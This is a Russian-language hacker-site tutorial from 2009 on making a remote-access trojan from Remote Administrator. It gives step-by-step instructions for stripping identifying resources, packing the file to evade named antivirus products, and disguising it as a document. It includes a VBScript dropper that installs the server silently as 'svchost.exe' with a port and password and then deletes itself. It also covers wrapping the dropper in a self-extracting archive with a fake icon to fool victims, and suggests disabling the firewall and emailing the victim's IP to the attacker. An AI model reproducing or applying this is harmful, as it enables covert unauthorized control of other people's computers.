[ Attackers.io.ua © 2009 ] ALL WEB IN HERE...

 

Удалённое управление за 5 минут




Написанное предполагает использование в LAN (LAN - Local Area Network, в народе "локалка"), однако вполне справедливо и для остальных сетевых систем и может быть с лёгкостью под них заточено :)

Итак, начнём! Что нам понадобится:

* Прямые руки
* Хотя бы начальные знания по программированию на скриптовых языках
* Установочный пакет Remote Administrator не ниже 2.0
* Программа Resource Hacker aka ResHacker
* Упаковщик PE EXE файлов ASPack


После того как мы заюзаем поисковик www.nigma.ru и вооружимся всем необходимым, нужно проверить, на месте ли руки и насколько хорошо работает серое вещество :) Только после этого рекомендую приступать непосредственно к действию. Начнём!

I. Для начала установим все скачанные программы куда следует. По желанию можно и крякнуть кое-какие из них ;) Но особой необходимости в этом нет.

II. Возьмём утилиту ResHacker. Она представляет собой отличный редактор ресурсов, т.е. с её помощью можно редактировать исполняемые файлы и библиотеки, вырезать/заменять/сохранять рисунки, курсоры, диалоги и всё остальное, что имеется в приложениях. Чем мы сейчас и займёмся.

III. Запускаем ResHacker, открываем в нём серверную часть Remote Administrator'a, которая наверняка лежит у тебя здесь: C:Program FilesRAdminr_server.exe. Нашёл? Открыл? Теперь смотрим, что здесь у нас имеется. Тааак... Хм... Видим 6 пунктов: Icon, Menu, Dialog, String Table, RCData, Icon Group. Вот это нам и надо! Берём и смело удаляем то, что, на наш взгляд, трояну абсолютно ни к чему. Зачем, например, иконки? Удалить... А вон диалог такой зачем? Удалить... А зачем иконка RAdmin в трее?! ;) Главное при этом - не увлекаться и ни в коем случае не удалять пункты String Table и RCData. Почему? Потому что они жизненно необходимы для работы программы. И крайне важно не зацепить ненароком те ди- алоги, которые понадобятся для настроек будущего зверька. Если вы покопаетесь для начала в "живой и здоровой" версии RAdmin'a, то поймёте, какие диалоги для чего нужны.

Это ещё не всё. Нужно на всякий пожарный удалить фразу "Remote Administrator" отовсюду, где она встречается, в том числе и из пунктов String Table и RCData. Мало ли...
Во время копания в файле не забывайте периодически сохраняться и запускать его для того, чтобы проверить, а не вырезали ли мы чего лишнего и работает ли он вообще?!

ВНИМАНИЕ! Для работы серверная часть нуждается в файле AdmDll.dll той же директории, что и файл r_server.exe!!! Не забудьте скопировать их вместе в отдельную папку для наших опытов.

VI. После того как мы убедимся, что вырезать уже больше нечего, а получившийся файл ещё работает, приступаем к следующей стадии. Запускаем программу ASPack, выставляем в настройках максимальное сжатие и жмём этой прогой наш файл. Сжали? Теперь нужно снова попробовать запустить его, чтобы убе- диться в работоспособности. Ошибок не выдаёт? Смотрим в процессы... вот он, родимый, висит! Есть!!! Возня с РАдмином закончена. Правда, назвать его РАдмином ТЕПЕРЬ довольно сложно... Думаете, не так? ОК, сейчас мы проверим, что думают об этом независимые эксперты. Кто? Догадайтесь с трёх раз, зачем мы провели всю эту процедуру. Я уверен: специально для того, чтобы наш зверёк не попался охотникам, которые в народе именуются антивирями. Да, к сожалению, с недавних пор РАдмин начал определяться практически всеми антивирусными пакетами. Но что они скажут теперь?!
Поделюсь опытом: я скормил свой файл следующим антивирусам:

- Kaspersky 6.0 (базы декабрь 2006)
- NOD32 v2.7 (базы январь 2007)
- Avast! (новые базы)
- DrWEB v4.33 (новые базы)
- Norton Antivirus (новые базы)

Ответом на сканирование было молчание. Quod erat demonstrandum, что и требовалось доказать. Полдела сделано! Идём к самой интересной (или наоборот, кому как) части. Сейчас будем писать троян-дроппер. Но сначала, чтобы наш файл попал на чей-нибудь комп, нужно расшарить (Share - "открывать в доступ") папку и положить туда r_server.exe и AdmDll.dll, переименовав, допустим, в Документ.doc и ReadMe.txt

V. Что это такое? Английское слово drop - "ронять", если дословно. Отсюда "dropper" - "ронятель" :) Иными словами, это программа, которая при запуске скачивает откуда надо другую программу, как правило саму серверную часть, и запускает с определёнными параметрами или без них, а также может совершать другие, не менее полезные действия ;)
Для написания дроппера нам потребуется следующее:

- Блокнот из стандартного набора Windows
- Знание Visual Basic Script (не путать с Visual Basic!!!)
- Минимальные знания сетевых технологий и информационной безопасности
- Знание особенностей мышления людей в целом и нужного человека в частности ;)
- ОБЯЗАТЕЛЬНО знать, что такое социальная инженерия
- Желательно знать, какие программы установлены на целевой машине

Для начала откроем Блокнот. Перед нами, если честно, очень широкий простор для фантазии. VBScript умеет следующее:

- Создавать, удалять, перемещать, переименовывать файлы, директории
- Устанавливать и читать атрибуты файлов и директорий
- Сканировать (с помощью средств Windows) локальную сеть и пинговать компьютеры
- Открывать в доступ папки
- Сносить процессы, в том числе системные
- Управлять запущенными процессами и запускать свои
- Отправлять e-mail куда надо, прикрепляя файлы
- Вытаскивать всю информацию о системе и многое-многое другое; статья посвящена не перечислению всех достоинств и недостатков VBS

Однако продолжим :) Пишем в Блокноте следующие строки:

On error resume next 'вставляем обработчик ошибок
Set FSO = CreateObject("Scripting.FileSystemObject") 'переменная FSO для работы с файлами и папками
Set WSHSHELL = CreateObject("WScript.Shell") 'Шелл для запуска программ, записи в реестр и пр.
Set File = FSO.GetFile("hostnamedirectoryДокумент.doc") 'находим переименованный r_server.exe
Set File2 = FSO.GetFile("hostnamedirectoryReadMe.txt") 'находим AdmDll.dll
File.Copy("C:WINDOWSSystemsvchost.exe") 'копируем на целевой комп
File2.Copy("C:WINDOWSSystemAdmDll.dll") 'туда же
WSHSHELL.Run"C:WINDOWSSystemsvchost.exe /install /port:4888 /pass:здесьпароль /silence /save"
FSO.DeleteFile("*.vbs") 'смываемся
WScript.Quit(0) 'окончательно смываемся


Что у нас получилось? Самый настоящий троян-дроппер, который скопирует что надо и запустит на компе, который нам нужно... Ну, неважно! :)

Разумеется, эти 10 строк - минимум, какой только можно придумать. Знающие люди могут значительно усовершенствовать данный код, например:

- Добавить запись в реестр параметр скрытия иконки RAdmin'a из трея
- Отключить брандмауэр Windows
- Отправить себе письмо с IP-адресом жертвы

Можно также закодировать скрипт с помощью Windows Script Encoder, чтобы не было видно исходного кода и в нём - вашего адреса.
Но юзер же заподозрит неладное, увидев незнакомую иконку?! Не беда, есть 2 пути, чтобы этого избежать. На самом деле не два, но я рассмотрю всего один.

IV. Берём архиватор WinRAR. Запаковываем наш скрипт, ставим галочку "Создать SFX-архив". Переходим на другую вкладку, там жмём "Параметры SFX". Что мы здесь видим? О-о-о, да просто рай для нас! Можно сделать файлу любую иконку, можно скрыть все диалоги распаковки... Фантазируйте, используйте стереотипы мышления людей, которые уверены, что в текстовых файлах вирусов не бывает! После запаковки получаем файл с вашей иконкой и расширением *.ехе, которое скрыто при настройках по умолчанию и не отображается в системе. ВСЁ! Троян готов! Теперь можно смело засылать его юзверю и ждать, когда же он перезагрузится, а потом открывать Remote Administrator Client и подключаться к его машине.

P.S. Статья простейшая, всё это делается максимум за 3 часа, а при наличии знаний и опыта гораздо быстрее и практически со 100% успехом.

Да, и ещё: перед тем как всё это делать, почитайте статьи 273-275 УК РФ и задумайтесь, а охота ли получить по чайнику? Даже от того, кому ваше творение придётся испытать на себе? Не делай другому того, чего не хочешь сам.

ВНИМАНИЕ! В статье намеренно опущены некоторые подробности, одна критического характера, другая может вызвать у пользователя за целевой машиной некоторые подозрения относительно своей безопасности.


Автор: WILDERWIND
inattack.ru


Создан 03 ноя 2009



  Комментарии       
Имя или Email


При указании email на него будут отправляться ответы
Как имя будет использована первая часть email до @
Сам email нигде не отображается!
Зарегистрируйтесь, чтобы писать под своим ником
 





DaMaGeLaB Pro-Hack.Ru XakNet TeaM InAttack BlackHack.Ru The Mafia
k0d.cc GraBBerZ.CoM BruteR.InfO Планету-ХаКеРаМ Defeated.Ru
World UNIX SecNull.Org CardersPlanet.Biz